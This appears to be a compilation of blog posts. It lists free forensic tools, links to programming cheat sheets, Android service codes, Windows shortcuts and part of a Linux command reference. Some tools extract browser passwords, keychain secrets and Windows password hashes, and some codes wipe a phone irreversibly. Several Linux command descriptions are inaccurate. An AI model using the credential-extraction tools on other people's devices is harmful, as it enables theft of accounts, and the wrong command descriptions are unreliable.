————————————————————————————————————–
MetaExtractor :
Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
http://www.4discovery.com/our-tools/
————————————————————————————————————–
MFTview :
Displays and decodes contents of an extracted MFT file
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
PictureBox :
Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
http://www.mikesforensictools.co.uk/MFTPB.html
————————————————————————————————————–
PsTools :
Suite of command-line Windows utilities
http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx
————————————————————————————————————–
Shadow Explorer :
Browse and extract files from shadow copies
http://www.shadowexplorer.com/
————————————————————————————————————–
SQLite Manager :
Firefox add-on enabling viewing of any SQLite
https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/
————————————————————————————————————–
Strings :
Command-line tool for text searches
http://technet.microsoft.com/en-gb/sysinternals/bb897439.aspx
————————————————————————————————————–
Structured Storage Viewer :
View and manage MS OLE Structured Storage based files
http://www.mitec.cz/ssv.html
————————————————————————————————————–
Switch-a-Roo :
Text replacement/converter/decoder for when dealing with URL encoding, etc
http://www.mikesforensictools.co.uk/MFTSAR.html
————————————————————————————————————–
Windows File Analyzer :
Analyse thumbs.db, Prefetch, INFO2 and .lnk files
http://www.mitec.cz/wfa.html
————————————————————————————————————–
Xplico :
Network forensics analysis tool
http://www.xplico.org/
————————————————————————————————————–
5. Mac OS tools

————————————————————————————————————–
Audit :
Audit Preference Pane and Log Reader for OS X
https://github.com/twocanoes/audit
————————————————————————————————————–
ChainBreaker :
Parses keychain structure, extracting user’s confidential information such as application account/password, encrypted volume password (e.g. filevault), etc
http://forensic.n0fate.com/?page_id=412
————————————————————————————————————–
Disk Arbitrator :
Blocks the mounting of file systems, complementing a write blocker in disabling disk arbitration
https://github.com/aburgh/Disk-Arbitrator
————————————————————————————————————–
Epoch Converter :
Converts epoch times to local time and UTC
https://www.blackbagtech.com/resources/freetools/epochconverter.html
————————————————————————————————————–
FTK Imager CLI for Mac OS :
Command line Mac OS version of AccessData’s FTK Imager
http://accessdata.com/product-download/digital-forensics/mac-os-10.5-and-10.6x-version-3.1.1
————————————————————————————————————–
IORegInfo :
Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
https://www.blackbagtech.com/resources/freetools/ioreg-info.html
————————————————————————————————————–
PMAP Info :
Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors
https://www.blackbagtech.com/resources/freetools/pmap-info.html
————————————————————————————————————–
Volafox :
Memory forensic toolkit for Mac OS X
http://forensic.n0fate.com/?page_id=412
————————————————————————————————————–
6. Mobile devices

————————————————————————————————————–
iPBA2 :
Explore iOS backups
http://ipbackupanalyzer.com/
————————————————————————————————————–
iPhone Analyzer :
Explore the internal file structure of iPad, iPod and iPhones
http://sourceforge.net/projects/iphoneanalyzer/
————————————————————————————————————–
ivMeta :
Extracts phone model and software version and created date and GPS data from iPhone videos.
http://www.csitech.co.uk/ivmeta-iphone-metadata/
————————————————————————————————————–
Last SIM Details :
Parses physical flash dumps and Nokia PM records to find details of previously inserted SIM cards.
http://lastsimdetails.blogspot.co.uk/p/downloads.html
————————————————————————————————————–
Rubus :
Deconstructs Blackberry .ipd backup files
http://www.cclgroupltd.com/Buy-Software/rubus-ipd-de-constructor-utility.html
————————————————————————————————————–
SAFT :
Obtain SMS Messages, call logs and contacts from Android devices
http://www.signalsec.com/saft/
————————————————————————————————————–
7. Data analysis suites

————————————————————————————————————–
Autopsy :
Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
http://www.sleuthkit.org/autopsy/
————————————————————————————————————–
Backtrack :
Penetration testing and security audit with forensic boot capability
http://www.backtrack-linux.org/
————————————————————————————————————–
Caine :
Linux based live CD, featuring a number of analysis tools
http://www.caine-live.net/
————————————————————————————————————–
Deft :
Linux based live CD, featuring a number of analysis tools
http://www.deftlinux.net/
————————————————————————————————————–
Digital Forensics Framework :
Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
http://www.digital-forensic.org/
————————————————————————————————————–
Forensic Scanner :
Automates ‘repetitive tasks of data collection’.
https://github.com/appliedsec/forensicscanner
————————————————————————————————————–
Paladin :
Ubuntu based live boot CD for imaging and analysis
http://www.sumuri.com/
————————————————————————————————————–
SIFT :
VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
http://computer-forensics.sans.org/community/downloads/
————————————————————————————————————–
The Sleuth Kit :
Collection of UNIX-based command line file and volume system forensic analysis tools
http://www.sleuthkit.org/sleuthkit/
————————————————————————————————————–
Volatility Framework :
Collection of tools for the extraction of artefacts from RAM
http://www.volatilityfoundation.org/
————————————————————————————————————–

8. Internet analysis

http://www.nirsoft.net/utils/mzcv.html
————————————————————————————————————–
MozillaHistoryView :
Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web pages
http://www.nirsoft.net/utils/mozilla_history_view.html
————————————————————————————————————–
MyLastSearch :
Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
http://www.nirsoft.net/utils/my_last_search.html
————————————————————————————————————–
PasswordFox :
Extracts the user names and passwords stored by Mozilla Firefox Web browser
http://www.nirsoft.net/utils/passwordfox.html
————————————————————————————————————–
OperaCacheView :
Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
http://www.nirsoft.net/utils/opera_cache_view.html
————————————————————————————————————–
OperaPassView :
Decrypts the content of the Opera Web browser password file, wand.dat
http://www.nirsoft.net/utils/opera_password_recovery.html
————————————————————————————————————–
Web Historian :
Reviews list of URLs stored in the history files of the most commonly used browsers
http://www.mandiant.com/resources/download/web-historian
————————————————————————————————————–
Web Page Saver :
Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages
http://info.magnetforensics.com/web-page-saver
————————————————————————————————————–

9. Registry analysis

————————————————————————————————————–
AppCompatCache Parser :
Dumps list of shimcache entries showing which executables were run and their modification dates.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
ForensicUserInfo :
Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
http://www.woanware.co.uk/forensics/forensicuserinfo.html
————————————————————————————————————–
Process Monitor :
Examine Windows processes and registry threads in real time
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
————————————————————————————————————–
RECmd :
Command line access to offline Registry hives. Supports simple & regular expression searches as well as searching by last write timestamp.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
Registry Decoder :
For the acquisition, analysis, and reporting of registry contents
http://www.digitalforensicssolutions.com/registrydecoder/
————————————————————————————————————–
Registry Explorer :
Offline Registry viewer. Provides deleted artefact recovery, value slack support, and robust searching.
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
RegRipper :
Registry data extraction and correlation tool
http://regripper.wordpress.com/
————————————————————————————————————–
Regshot :
Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
http://sourceforge.net/projects/regshot/files/
————————————————————————————————————–
ShellBags Explorer :
Presents visual representation of what a user’s directory structure looked like. Additionally exposes various timestamps (e.g., first explored, last explored for a given folder).
http://binaryforay.blogspot.co.uk/p/software.html
————————————————————————————————————–
USB Device Forensics :
Details previously attached USB devices on exported registry hives
http://www.woanware.co.uk/forensics/usbdeviceforensics.html
————————————————————————————————————–
USB Historian :
Displays 20+ attributes relating to USB device use on Windows systems
http://www.4discovery.com/our-tools/
————————————————————————————————————–
USBDeview :
Details previously attached USB devices
http://www.nirsoft.net/utils/usb_devices_view.html
————————————————————————————————————–
User Assist Analysis :
Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
http://www.4discovery.com/our-tools/
————————————————————————————————————–
UserAssist :
Displays list of programs run, with run count and last run date and time
http://blog.didierstevens.com/programs/userassist/
————————————————————————————————————–
Windows Registry Recovery :
Extracts configuration settings and other information from the Registry
http://www.mitec.cz/wrr.html
————————————————————————————————————–
10. Application analysis

————————————————————————————————————–
Dropbox Decryptor :
Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
http://info.magnetforensics.com/dropbox-decryptor
————————————————————————————————————–
Google Maps Tile Investigator :
Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
http://info.magnetforensics.com/google-maps-tile-investigator
————————————————————————————————————–
KaZAlyser :
Extracts various data from the KaZaA application
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
LiveContactsView :
View and export Windows Live Messenger contact details
http://www.nirsoft.net/utils/live_messenger_contacts.html
————————————————————————————————————–
SkypeLogView :
View Skype calls and chats
http://www.nirsoft.net/utils/skype_log_view.html
————————————————————————————————————–


 

I know personally, I am not one of those people that can remember every detail of every language and never look anything up. It’s nice to have a cheat sheet with a quick summary of some of the most commonly used procedures, tags, tools, syntax, etc., saving time that would have been used to look it up on Google or dig through documentation either online or in printed text. The following is a list of links to several different cheat sheets on a wide variety of tasks and tools.

You can print them out and hang them on your wall (my personal choice) or simply bookmark them for easy access down the road. If you have any additional suggestions or see something I have missed, let me know…

 

Command Line

Windows Command Line Reference

BASH Command Line Reference

DOS Commands

 

Databases

MySQL Cheat Sheet

MySQL Reference List

Oracle Cheat Sheet

Oracle PL/SQL Cheat Sheet

Oracle 9i Server Reference (PDF)

Oracle 9i Command Reference

PostgreSQL Cheat Sheet

SQL Cheat Sheet

SQL Server 2005 Commands

 

Programming

Ada Syntax Card (PDF)

ASP/VBScript Cheat Sheet

C++ Language Summary

C++ Reference Sheet (PDF)

C++ Containers Cheat Sheet

C# Language Reference

Delphi Technical Reference Card (PDF)

Java Syntax Cheat Sheet

Java Quick Reference (PDF)

Java Reference for C++

JSP 2.0 Syntax Reference Sheet (PDF)

LaTEX Reference Card (PDF)

PERL Cheat Sheet

PERL Reference Card (PDF)

PERL Regular Expression Quick Reference (PDF)

PERL Reference Guide

PHP Cheat Sheet

PHP Developer Cheat Sheet

Python 101 Cheat Sheet

Python Cheat Sheet

Python Quick Reference (PDF)

Ruby Cheat Sheet (PDF)

Ruby Reference

Ruby on Rails Reference Sheet

 

Unix/Linux

Debian Linux Reference Guide (PDF)

Linux Shortcuts and Commands

One Page Linux Manual (PDF)

TCP Ports List

Treebeard’s Unix Cheat Sheet

Unix Command Line Tips

 

Web Development

Actionscript 2.0 Cheat Sheet (PDF)

Actionscript 3.0 Cheat Sheet (PDF)

CSS Cheat Sheet

CSS 2 Reference Card (PDF)

CSS Reference Sheet

CSS Shorthand Guide

CSS Useful Properties

Drupal 4.7 Cheat Sheet

.htaccess Cheat Sheet

HTML Cheat Sheet

HTML Dom Quick Reference Card (PDF)

Javascript Cheat Sheet

Javascript Quick Reference

Javascript Reference Page

JQuery Cheat Sheet (PDF)

JQuery Reference (PDF)

Mod_Rewrite Cheat Sheet

Scriptaculous Combination Effects Field Guide (PDF)

XHTML Cheat sheet

XHTML Reference

XHTML & HTML Cheat Sheet

XML Syntax Quick Reference (PDF)

XML Schema Reference (PDF)

XSLT and XPath Quick Reference (PDF)

 

Miscellaneous Topics

Ascii Codes Cheat Sheet

CVS Cheat Sheet

Regular Expressions Cheat Sheet

RGB Hex Colour Chart

Subversion Quick Reference (PDF)

Theoretical Computer Science Cheat Sheet (PDF)

UML Quick Reference Card (PDF)

UML Cheat Sheet

Vi Cheat Sheet

Vim Commands Cheat Sheet

XEmacs Commands Cheat Sheet

 


When working on an app or code, you may often need some reference material; that’s where cheatsheets become very useful.

Here we present you with an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework.

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers.

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheet for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing faith in MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.

 

TV_Android

1. Complete Information About your Phone

*#*#4636#*#*
This code can be used to get some interesting information about your phone and battery. It shows the following 4 menus on screen:
• Phone information
• Battery information
• Battery history
• Usage statistics

2. Factory data reset

*#*#7780#*#*
This code can be used for a factory data reset. It’ll remove the following things:
• Google account settings stored in your phone
• System and application data and settings
• Downloaded applications
It’ll NOT remove:
• Current system software and bundled application
• SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. Format Android Phone

*2767*3855#
Think before you give this code. This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.
Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*#*
This code is used to get information about the phone camera. It shows the following 4 menus:
• Update camera firmware in image (Don’t try this option)
• Update camera firmware in SD card
• Get camera firmware version
• Get firmware update count
WARNING: Never use the first option otherwise your phone camera will stop working and you’ll need to take your phone to service centre to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*
This one is my favourite one. This code can be used to change the “End Call / Power” button action in your phone. By default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.
You can change this action using this code. You can enable direct power off on this button so you don’t need to waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*

This code opens a File copy screen where you can back up your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#*#*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* – WLAN test (Use “Menu” button to start various tests)

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Another GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Change list number

10. Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version


Download the PDF cheat sheet >Caintech.co.uk Windows Shortcuts You Should All Know To Save Time

 

Windows Explorer Keyboard Shortcuts

* END (Display the bottom of the active window)

* HOME (Display the top of the active window)

* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

* NUM LOCK+Minus sign (-) (Collapse the selected folder)

* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

 

Shortcut Keys for Character Map

* After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:

* RIGHT ARROW (Move to the right or to the beginning of the next line)

* LEFT ARROW (Move to the left or to the end of the previous line)

* UP ARROW (Move up one row)

* DOWN ARROW (Move down one row)

* PAGE UP (Move up one screen at a time)

* PAGE DOWN (Move down one screen at a time)

* HOME (Move to the beginning of the line)

* END (Move to the end of the line)

* CTRL+HOME (Move to the first character)

* CTRL+END (Move to the last character)

* SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)

 

Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

* CTRL+O (Open a saved console)

* CTRL+N (Open a new console)

* CTRL+S (Save the open console)

* CTRL+M (Add or remove a console item)

* CTRL+W (Open a new window)

* F5 key (Update the content of all console windows)

* ALT+SPACEBAR (Display the MMC window menu)

* ALT+F4 (Close the console)

* ALT+A (Display the Action menu)

* ALT+V (Display the View menu)

* ALT+F (Display the File menu)

* ALT+O (Display the Favourites menu)

 

MMC Console Window Keyboard Shortcuts

* CTRL+P (Print the current page or active pane)

* ALT+Minus sign (-) (Display the window menu for the active console window)

* SHIFT+F10 (Display the Action shortcut menu for the selected item)

* F1 key (Open the Help topic, if any, for the selected item)

* F5 key (Update the content of all console windows)

* CTRL+F10 (Maximize the active console window)

* CTRL+F5 (Restore the active console window)

* ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

* F2 key (Rename the selected item)

* CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

 

Remote Desktop Connection Navigation

* CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

* ALT+PAGE UP (Switch between programs from left to right)

* ALT+PAGE DOWN (Switch between programs from right to left)

* ALT+INSERT (Cycle through the programs in most recently used order)

* ALT+HOME (Display the Start menu)

* CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

* ALT+DELETE (Display the Windows menu)

* CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

* CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)

 

Internet Explorer navigation

* CTRL+B (Open the Organize Favourites dialog box)

* CTRL+E (Open the Search bar)

* CTRL+F (Start the Find utility)

* CTRL+H (Open the History bar)

* CTRL+I (Open the Favourites bar)

* CTRL+L (Open the Open dialog box)

* CTRL+N (Start another instance of the browser with the same Web address)

* CTRL+O (Open the Open dialog box, the same as CTRL+L)

* CTRL+P (Open the Print dialog box)

* CTRL+R (Update the current Web page)

* CTRL+W (Close the current window)

 


Ever wondered what the numbers on your credit card mean? Well, wonder no longer.

CrackingCreditCode


Following on from a recent post, ‘Nmap Cheat Sheet’, I have decided to create another cheat sheet, but this time for GNU/Linux, as I am constantly referring to it for reference. These kinds of things are very handy: if you are like me and don’t use Linux on a daily basis, they can play a major part in jogging the little grey cells.

Download:  Cheat Sheet commands for GNU/Linux

CheatSheet commands for GNU / Linux

System Information

1. arch: show the architecture of the machine (1).
2. uname -m: show the architecture of the machine (2).
3. uname -r: show the kernel version used.
4. dmidecode -q: display the hardware components of the system.
5. hdparm -i /dev/hda: show the characteristics of a hard disk.
6. hdparm -tT /dev/sda: perform a read test on a hard disk.
7. cat /proc/cpuinfo: show CPU information.
8. cat /proc/interrupts: show interrupts.
9. cat /proc/meminfo: verify memory usage.
10. cat /proc/swaps: show swap files.
11. cat /proc/version: display the version of the kernel.
12. cat /proc/net/dev: show network adapters and statistics.
13. cat /proc/mounts: display the mounted file systems.
14. lspci -tv: show PCI devices.
15. lsusb -tv: show USB devices.
16. date: display the system date.
17. cal 2013: show calendar 2013.
18. cal 07 2013: show the calendar for the month July 2013.
19. date 041217002013.00: set the date and time.
20. clock -w: save changes to the BIOS date.

Shutdown (Reset System or Log out)

1. shutdown -h now: Shut down system (1).
2. init 0: Shut down system (2).
3. telinit 0: Shut down system (3).
4. halt: shutdown the system (4).
5. shutdown -h hours:minutes &: planned shutdown of the system.
6. shutdown -c: cancel a planned shutdown of the system.
7. shutdown -r now: Restart (1).
8. reboot: Reboot (2).
9. logout: close session.

Files and Directories

1. cd /home: enter the “home” directory.
2. cd ..: go back one level.
3. cd ../..: back 2 levels.
4. cd: go to the root directory.
5. cd ~user1: go to directory user1.
6. cd -: go (back) to the previous directory.
7. pwd: show the path of the working directory.
8. ls: see the files in a directory.
9. ls -F: see the files in a directory.
10. ls -l: show details of files and folders in a directory.
11. ls -a: show hidden files.
12. ls *[0-9]*: show the files and folders that contain numbers.
13. tree: display files and folders in a tree starting from the root. (1)
14. lstree: display files and folders in a tree starting from the root. (2)
15. mkdir dir1: create a folder or directory called ‘dir1’.
16. mkdir dir1 dir2: create two folders or directories simultaneously (Create two directories at once)
17. mkdir -p /tmp/dir1/dir2: create a directory tree.
18. rm -f file1: delete the file called file1.
19. rmdir dir1: delete the folder called dir1.
20. rm -rf dir1: delete a folder called dir1 with its contents recursively.
21. rm -rf dir1 dir2: delete two folders (directories) with their contents recursively.
22. mv dir1 new_dir: rename or move a file or folder (directory).
23. cp file1: copy a file.
24. cp file1 file2: copy two files together.
25. cp dir/* . : copy all the files of a directory into the current working directory.
26. cp -a /tmp/dir1 . : copy a directory into the current working directory.
27. cp -a dir1: copy a directory.
28. cp -a dir1 dir2: copy two directories.
29. ln -s file1 lnk1: create a symbolic link to the file or directory.
30. ln file1 lnk1: create a hard (physical) link to the file or directory.
31. touch -t 0712250000 file1: modify the real time (time of creation) of a file or directory.
32. file file1: output (screen dump)
33. iconv -l: list the known encodings.
34. iconv -f fromEncoding -t toEncoding inputFile > outputFile: create a new file from the input file, assuming it is encoded in fromEncoding and converting it to toEncoding.
35. find . -maxdepth 1 -name '*.jpg' -print -exec convert "{}" -resize 80x60 "thumbs/{}" \;: resize the files in the current directory and send them to a thumbnails directory (requires convert from ImageMagick).

Finding Files

1. find / -name file1: file and directory search from the root of the system.
2. find / -user user1: find files and directories belonging to user user1.
3. find /home/user1 -name \*.bin: search for files with extension ‘.bin’ within the directory ‘/home/user1’.
4. find /usr/bin -type f -atime +100: look at binary files used in the last 100 days.
5. find /usr/bin -type f -mtime -10: find the changed files created within the last 10 days.
6. find / -name \*.rpm -exec chmod 755 ‘{}’ \;: look for files with extension. ‘rpm’ and change permissions.
7. find / -xdev -name \*.rpm: Find files with extension ‘. rpm’ ignoring them removable devices such as cdrom, pen-drive, etc ….
8. locate \*.ps: find files with extension. ‘ps’ primarily executed with the command ‘updatedb’.
9. whereis halt: show the location of a binary file. In this case you are wondering Where he command ‘halt’
10. which halt: show the full path (full path to it) to a binary / executable.

Mounting a file system

1. mount /dev/hda2 /mnt/hda2: mount a disk called hda2. First check that the directory ‘/mnt/hda2’ exists; if not, create it.
2. umount /dev/hda2: unmount a disk called hda2. First leave the mount point ‘/mnt/hda2’.
3. fuser -km /mnt/hda2: force umount when the device is busy.
4. umount -n /mnt/hda2: unmount without writing to the file /etc/mtab. Useful when the file is read-only or the hard drive is full.
5. mount /dev/fd0 /mnt/floppy: mount a floppy disk.
6. mount /dev/cdrom /mnt/cdrom: mount a cdrom / dvdrom.
7. mount /dev/hdc /mnt/cdrecorder: mount a rewritable cd or dvdrom.
8. mount /dev/hdb /mnt/cdrecorder: mount a rewritable cd / dvdrom (a dvd).
9. mount -o loop file.iso /mnt/cdrom: mount a file or iso image.
10. mount -t vfat /dev/hda5 /mnt/hda5: mount a FAT32 file system.
11. mount /dev/sda1 /mnt/usbdisk: mount a usb thumb drive or memory stick (without specifying the filesystem type).

Hard Disk Space

1. df -h: display a list of mounted partitions.
2. ls -lSr |more: show the size of the files and directories sorted by size.
3. du -sh dir1: Estimate the space used by the directory dir1.
4. du -sk * | sort -rn: show the size of the files and directories sorted by size.
5. rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1n: show space used by the installed rpm packages organized by size (Fedora, Redhat and others).
6. dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1n: show space used by the packages installed, organized by size (Ubuntu, Debian and others).

Users and Groups

1. groupadd name_of_the_group: create a new group.
2. groupdel name_of_the_group: delete a group.
3. groupmod -n new_name_of_the_group old_name_of_the_group: rename a group.
4. useradd -c "Name Surname" -g admin -d /home/user1 -s /bin/bash user1: create a new user belonging to the group “admin”.
5. useradd user1: create a new user.
6. userdel -r user1: delete a user (‘-r’ eliminates home directory).
7. usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1: change user attributes.
8. passwd: Changing password.
9. passwd user1: change the password of a user (only root).
10. chage -E 2013-12-31 user1: set an expiry date for the user’s account. In this case it expires on December 31, 2013.
11. pwck: check the syntax and format of the file ‘/etc/passwd’ and the existence of users.
12. grpck: check the syntax and format of the file ‘/etc/group’ and the existence of groups.
13. newgrp group_name: log in to a new group to change the default group of newly created files.

File Permissions (Use “+” to place permissions and “-” to remove)

1. ls -lh: Show permissions.
2. ls /tmp | pr -T5 -W$COLUMNS: divide the terminal output into 5 columns.
3. chmod ugo+rwx directory1: give read (r), write (w) and execute (x) permissions to the owner (u), group (g) and others (o) on the directory ‘directory1’.
4. chmod go-rwx directory1: remove read (r), write (w) and execute (x) permissions from the group (g) and others (o) on the directory ‘directory1’.
5. chown user1 file1: change owner of a file.
6. chown -R user1 directory1: change the owner of a directory and all files and directories contained within.
7. chgrp group1 file1: change the group of a file.
8. chown user1:group1 file1: change user and group ownership of a file.
9. find / -perm -u+s: display all system files with SUID configured.
10. chmod u+s /bin/file1: set the SUID bit on a binary file. The user running that file gets the same privileges as the owner.
11. chmod u-s /bin/file1: disable SUID bit on a binary file.
12. chmod g+s /home/public: set the SGID bit on a directory, similar to SUID but for directories.
13. chmod g-s /home/public: disable SGID bit on a directory.
14. chmod o+t /home/public: set the STICKY bit on a directory. Allows files to be deleted only by their rightful owners.
15. chmod o-t /home/public: disable the STICKY bit on a directory.


Special Attributes on files (Use “+” to place permissions and “-” to remove)

1. chattr +a file1: allows a file to be opened for writing only in append mode.
2. chattr +c file1: allows a file to be compressed / decompressed automatically.
3. chattr +d file1: ensures that the dump program ignores the file during backup.
4. chattr +i file1: makes the file immutable, so it cannot be removed, altered, renamed, or linked.
5. chattr +s file1: allows a file to be deleted safely.
6. chattr +S file1: ensures that when a file is modified, the changes are written in synchronous mode, as with sync.
7. chattr +u file1: allows you to restore the contents of a file even if it is deleted.
8. lsattr: show special attributes.


Compressed files

1. bunzip2 file1.bz2: decompress a file called ‘file1.bz2’.
2. bzip2 file1: compress a file called file1.
3. gunzip file1.gz: decompress a file called ‘file1.gz’.
4. gzip file1: compress a file called ‘file1’.
5. gzip -9 file1: compress with maximum compression.
6. rar a file1.rar test_file: create a rar file called ‘file1.rar’.
7. rar a file1.rar file1 file2 dir1: compress ‘file1’, ‘file2’ and ‘dir1’ simultaneously.
8. rar x file1.rar: decompress rar file.
9. unrar x file1.rar: decompress rar file.
10. tar -cvf archive.tar file1: create an uncompressed tarball.
11. tar -cvf archive.tar file1 file2 dir1: create an archive containing ‘file1’, ‘file2’ and ‘dir1’.
12. tar -tf archive.tar: show the contents of an archive.
13. tar -xvf archive.tar: extract a tarball.
14. tar -xvf archive.tar -C /tmp: extract a tarball in /tmp.
15. tar -cvjf archive.tar.bz2 dir1: create a tarball compressed into bzip2.
16. tar -xvjf archive.tar.bz2: decompress a bzip2 compressed tar file.
17. tar -cvzf archive.tar.gz dir1: create a gzip tarball.
18. tar -xvzf archive.tar.gz: decompress a gzip compressed tar archive.
19. zip file1.zip file1: create a zip file.
20. zip -r file1.zip file1 file2 dir1: compress in zip several files and directories simultaneously.
21. unzip file1.zip: decompress a zip file.


RPM Packages (Red Hat, Fedora…etc)

1. rpm -ivh package.rpm: install an rpm package.
